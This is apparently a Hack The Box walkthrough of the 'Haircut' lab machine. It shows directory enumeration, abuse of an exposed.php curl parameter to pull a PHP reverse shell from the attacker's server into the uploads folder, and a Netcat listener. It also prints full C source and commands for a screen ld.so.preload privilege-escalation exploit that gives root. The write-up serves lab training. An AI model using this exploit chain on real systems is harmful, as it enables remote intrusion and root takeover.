Haircut Hack the Box
The Ip address of the box: 10.10.10.24
Observe the nmap ran gave two ports opened.
Opened 80 port in the browser and observed the home page has an image file. Downloaded the image for any hidden parts, also inspected the home page if any clues hidden in comments, but no luck.
Ran gobuster for any subdirectories present:
gobuster dir -u http://10.10.10.24:80/ -t 500 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
It gave uploads folder but 302 to uploads/. But uploads/ shows forbidden.
So ran file checks in uploads with extensions php, html and text files. But found nothing.
gobuster dir -u http://10.10.10.24:80/ -t 500 -x php,html,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
I thought it’s a dead-end here, and was checking for port 22 hints. I have totally forgotten that I have not run the file extensions check in the home folder. So ran that:
Found exposed.php, went to that php file in the browser. It seems there is a lfi present, just entered 123 to check what error it gives us.
As seen in the above image we can see the curl is giving an error, so thought of trying remote file inclusion.
Use reverse shell from below url:
start a python server in kali machine where this reverse shell is present,
tried curl to upload reverse shell in the present web folder, but app says permission denied.
We have observed there was an uploads folder, so tried to upload thereby below command:
http://10.10.14.13:8000/reverse_shell.php — output ./uploads/file.php
observe in the above image we were able to upload the reverse shell in the uploads folder.
start a Netcat listener in my attacker kali machine and go to the uploads reverse shell path in the browser.
observe we got the shell in the listener.
now let’s run linpeas.sh for privilege escalation.
get the script from here:
Observe linpeas says the screen command can be used for privilege escaltion.
after searching found this below exploit:
which is create a c file as below:
libhax.c, we compile this as a shared object which we can load using preload
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}and rootshell.c as below
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}execute the c file which has to be loaded as below:
gcc -fPIC -shared -ldl -o libhax.so libhax.cexecute the root shell command as below
gcc -o rootshell rootshell.c
execute them as above and now run a python server in the attacker kali machine and get them to the victim machine.
Now, navigate to, etc and run below commands
cd /etc
umask 000
/usr/bin/screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
/usr/bin/screen -ls
/tmp/rootshellAnd observe we got root.
